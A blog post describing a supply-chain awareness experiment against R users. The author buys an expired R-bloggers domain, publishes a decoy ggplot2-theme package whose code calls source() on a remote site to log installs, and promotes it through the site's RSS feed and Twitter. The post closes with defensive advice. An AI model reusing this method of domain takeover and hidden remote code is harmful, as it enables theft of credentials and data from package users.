R Packages: Are we too trusting?
One of the great things about R, is the myriad of packages. Packages are typically installed via
- CRAN
- Bioconductor
- GitHub
But how often do we think about what we are installing? Do we pay attention or just install when something looks neat? Do we think about security or just take it that everything is secure? In this post, we conducted a little nefarious experiment to see if people pay attention to what they install.
R-bloggers: The hook
R-bloggers is great a resource for keeping on top of what’s happening in the world of R. It’s one the resources we recommend whenever we run training courses. For an author to get their site syndicated to R-bloggers, they have to email Tal who will ensure that the site isn’t spammy. I recently saw a tweet (I can’t remember who from) who suggested tongue in cheek that to boost your website ranking, just grab a site that used to appear on R-bloggers.
This gave me an idea for something a bit more devious! Instead of boosting website traffic, could we grab a domain, create a dummy R package, then monitor who installs this package!
A list of contributing sites is nicely provided by R-bloggers. A quick and dirty script grabs select target domains. First we load a few packages
library(httr)
library(tidyverse)
library(rvest)
Then extract all URLs from the page
page_source = "https://www.r-bloggers.com/blogs-list/" %>%
read_html()
urls = html_attr(html_nodes(page_source, "a"), "href")
With a little helper function to get the status code
# If a site is available, it should return 200
get_status_code = function(url) {
status = try(GET(url)$status, silent = TRUE)
if (class(status) == "try-error")
status = NA
status
}
we simply probe each URL
# Lots of threads
status_codes = parallel::mclapply(urls, get_code, mc.cores = 24)
status_codes = unlist(status_codes)
In total, there were 43 URLs not returning the required status code of 200
tibble(urls = urls, status_codes = status_codes) %>%
filter(!is.na(status_codes)) %>%
filter(status_codes != 200) %>%
head()
# A tibble: 6 x 2
urls status_codes
<chr> <int>
1 http://www.56n.dk 406
2 http://bio7.org/ 403
3 http://www.seascapemodels.org/bluecology_blog/index.html 404
4 https://climateecology.wordpress.com 410
5 http://www.compmath.com/blog 500
6 https://hamiltonblake.github.io 404
In the end, we went with vinux.in
. Using the Wayback machine, this site seems to have died around 2017. The cost of claiming this site was £10 for the year.
By claiming this site, I have automatically got a site that has incoming traffic. One evil strategy is simply to set back and get traffic from R-bloggers.
{blogdown} & {ggplot2}: the bait
Next, I created a GitLab user rstatsgit
and a blog via the excellent {blogdown} package. Now clearly we need something to entice people to run our code, so I created a very simple R package the scans {ggplot2} themes. Nothing fancy, only a dozen lines of code or so. In case someone looked at the GitHub page, I just copied a few badges from other packages to make it look more genuine. I used netlify to link our new blog to our recently purchased domain. The resulting blog doesn’t look too bad at all.
At the bottom of one of the .R
files in the package, there is a simple source()
command. This, in theory, could be used to do anything - grab data, passwords, ssh keys. Clearly, we don’t do any of this. Instead, it simply pings a site to tell us if the package has been installed.
R-bloggers & twitter: Delivery
To deliver the content, I’m going for a combination of trying to get it onto r-bloggers via the old RSS feed and tweeting about the page with the #rstats
tag.
Did people install the package
I’ll update the blog post with results in a week or two.
Who is not to blame
It’s instructive to think about who is not to blame:
- Gitlab/GitHub: it would be impossible for them to police who code that is uploaded to their site.
- {devtools}(install_git*()): They’re many legitimate uses for this function. Blaming it would be the equivalent to blaming StackOverflow for bad advice. It doesn’t really make sense.
- R-bloggers: It simply isn’t feasible to thoroughly vet every post. In the past, the site has quickly reacted to anything spammy and removed offending articles. They also have no control
- The person who owned the site: Nope. They owned the site. Now they don’t. They have no responsibility.
Who is to blame?
Well, I suppose I’m to blame since I created the site and package ;) But more seriously if you installed the package, you’re to blame! I think everyone is guilty of copying and pasting code from blogs, StackOverflow, forums and not always understanding what’s going on. But the internet is a dangerous place, and most people who us R, almost certainly have juicy data that shouldn’t be released to the outside world.
By pure coincidence, I’ve noticed that Bob Rudis has started emphasising that we should be more responsible about what we install.
How to protect against this?
This is something we have been helping clients tackle over the last two years. On one hand, companies use R to run the latest algorithms and try cutting edge visualisation methods. On top of this, they employ bright and enthusiastic data scientists who enjoy what they do. If companies make things too restrictive, people will either find a way around the problem or simply leave.
The crucial thing to remember is that if someone really wants to do something unsafe, we can’t stop them. Instead, we need to provide safe alternatives that don’t hinder work while at the same time reduce overall risk.
When dealing with companies we help them tackle the problem in a number of ways
- Education! Both of the team and team leaders!
- Have an internal package repository. Either we build this, or use RStudio’s package manager we’re one of the few RStudio Certified partners in the world).
- We may disable tools such as
install_github()
- Reduce risk by having clear testing and deployment machines
- Implement two-factor authentication
All of the above can be circumvented by a data scientist. But the idea is with education, we can reduce the potential risk while not impeding day to day work.